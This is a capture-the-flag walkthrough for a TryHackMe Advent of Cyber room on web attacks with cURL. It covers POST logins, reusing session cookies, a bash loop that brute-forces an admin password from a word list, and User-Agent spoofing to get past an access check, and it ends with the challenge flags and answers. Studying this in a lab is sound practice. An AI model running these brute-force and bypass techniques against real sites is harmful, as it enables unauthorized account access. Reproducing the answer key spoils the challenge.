Access the room: https://tryhackme.com/room/webhackingusingcurl-aoc2025-w8q1a4s7d0
.png)
According to blue-team intel, the wormhole is held open by a control panel on the Evil Bunnies’ web server. The team must shut it down first to cut off reinforcements before facing King Malhare.
However, the terminal they have is bare. No Burp Suite, no browser, just a command prompt.
But that’s fine. The team will use the command line and cURL to speak HTTP directly: send requests, read responses, and find the endpoints that shut the portal.
Learning Objectives
- Understand what HTTP requests and responses are at a high level.
- Use cURL to make basic requests (using GET) and view raw responses in the terminal.
- Send POST requests with cURL to submit data to endpoints.
- Work with cookies and sessions in cURL to maintain login state across requests.
Step by Step Walkthrough
Initial Setup
Start the target machine and the AttackBox as instructed to access the lab environment.
Note: Make sure to replace MACHINE_IP with your target machine’s IP in my walkthrough write-up.
Understanding HTTP and cURL
HTTP (Hypertext Transfer Protocol) is the language used by clients to request resources from servers. Every page load, form submission, or API call boils down to an HTTP request followed by a response.
curl allows us to manually create those requests. Instead of clicking buttons or filling forms, we send the same data directly from the terminal. This gives us full visibility and control over what is being sent.
To request the home page of a server, we can simply run:
curl http://MACHINE_IP/
This sends an HTTP GET request and prints the raw HTML response directly in the terminal.
Exploiting POST Requests
Most login forms submit credentials using the POST method. By observing the form action, we can replicate the request manually.
A basic POST request with credentials looks like this:
curl -X POST -d "username=user&password=user" http://MACHINE_IP/post.php
Here:
-X POSTspecifies the HTTP method.-dsends form data in URL-encoded format.
If the credentials are incorrect, the application returns an error message.
Adding the -i flag reveals response headers, which is useful for spotting redirects, cookies, or session identifiers:
curl -X POST -d "username=user&password=user&submit=Login" http://MACHINE_IP/post.php
To view exactly what the server returns (including headers and potential redirects), add the -i flag:
curl -i -X POST -d "username=user&password=user&submit=Login" http://MACHINE_IP/post.php
Now let’s Make a POST request to the /post.php endpoint with the username admin and the password admin:
curl -i -X POST -d "username=admin&password=admin" http://MACHINE_IP/post.php
Hooray, we’re logged in and have found our flag! THM{curl_post_success}
Session Handling with Cookies
Web applications rely on cookies to maintain authenticated sessions. Browsers handle cookies automatically, but with cURL, we must manage them ourselves.
We authenticate and save the cookies in cookie.txt file uisng this command:
curl -c cookies.txt -d "username=admin&password=admin" http://MACHINE_IP/session.php
For this case we will get invalid credentials, but you’ll often see a session cookie like PHPSESSID=xyz123.
After saving the cookie we will reuse the session cookie to access the same endpoint using this command:
curl -b cookies.txt http://MACHINE_IP/session.php- The
-boption tells cURL to send the saved cookies in the next request, just like a browser would.
Now let's grab our second flag by sending a request to the /cookie.php endpoint using the username "admin" and the password "admin," then save the cookie:
curl -c cookies.txt -d "username=admin&password=admin" http://MACHINE_IP/cookie.php
Next, we reuse the session cookie to access the same endpoint:
curl -b cookies.txt http://MACHINE_IP/cookie.php
Hurray we got our second flag! THM{session_cookie_master}
Brute Forcing Credentials with cURL
Once we understand how a login request works, automating it becomes trivial. In this challenge, a weak login form is vulnerable to brute forcing.
Begin by creating a file named passwords.txt and adding the following passwords to it:
nano passwords.txtPaste the following password lists in it
admin123
password
letmein
secretpass
secretSave and exit (Ctrl+X, then Y, then Enter).
Now lets create a simple bash loop called loop.sh to try each password against bruteforce.php:
nano loop.shPaste the following script in it
for pass in $(cat passwords.txt); do
echo "Trying password: $pass"
response=$(curl -s -X POST -d "username=admin&password=$pass" http://10.48.188.27/bruteforce.php)
if echo "$response" | grep -q "Welcome"; then
echo "[+] Password found: $pass"
break
fi
doneSave and exit (Ctrl+X, then Y, then Enter).
Then add the execute permission to the script
chmod +x loop.shGo ahead and run the brute force script now:
./loop.sh
We discovered the password, and it turns out the admin user's password is secretpass.
The following script was used for brute-forcing:
- Sends repeated POST requests.
- Checks responses for a success indicator.
- Stops once the correct password is found.
This manual approach mirrors the behavior of automated tools like Hydra, Burp Intruder, or WFuzz, helping us understand what they do behind the scenes.
Bypassing User-Agent Restrictions
Some applications restrict access based on the User-Agent header to block tools like cURL.
By default, cURL identifies itself clearly: User-Agent: curl/7.x.x
To specify a custom user-agent, we can use the -A flag:
curl -A "internalcomputer" http://MACHINE_IP/ua_check.php
To confirm the check run these commands:
curl -i http://MACHINE_IP/ua_check.php
curl -i -A "internalcomputer" http://MACHINE_IP/ua_check.php
If the first fails and the second succeeds, the UserAgent check is working, and we’ve bypassed it by spoofing.
Now let’s make a request to the /agent.php endpoint with the user-agent TBFC:
curl -A "TBFC" http://MACHINE_IP/agent.php
Hurray we found our last flag! THM{user_agent_filter_bypassed}
Bonus Mission
This section is optional and applies only to the final bonus question. The instructions in this section do not apply to the regular questions. Feel free to skip it and proceed with the regular questions if you don’t intend to attempt it.
Before the final battle can begin, the wormhole must be closed to stop enemy reinforcements. The evil Easter bunnies operate a web control panel that holds it open. The blue team must identify endpoints, authenticate and obtain the operator token, and call the close operation.
Hint: Use rockyou.txt when brute forcing for the password (only for the bonus mission). The PIN is between 4000 and 5000.
Secret hint:
Use the following code to generate numbers list from 4000 to 5000 for brute forcing the password:
seq 4000 5000 > numbers.txtServer: http://10.48.188.27/terminal.php?action=panel
Lab Answers
Make a POST request to the
/post.phpendpoint with the usernameadminand the passwordadmin. What is the flag you receive?
THM{curl_post_success}.
— — — — — — — — — — — — — — —
Make a request to the
/cookie.phpendpoint with the usernameadminand the passwordadminand save the cookie. Reuse that saved cookie at the same endpoint. What is the flag your receive?
THM{session_cookie_master}.
— — — — — — — — — — — — — — —
After doing the brute force on the
/bruteforce.phpendpoint, what is the password of theadminuser?
secretpass.
— — — — — — — — — — — — — — —
Make a request to the
/agent.phpendpoint with the user-agentTBFC. What is the flag you receive?
THM{user_agent_filter_bypassed}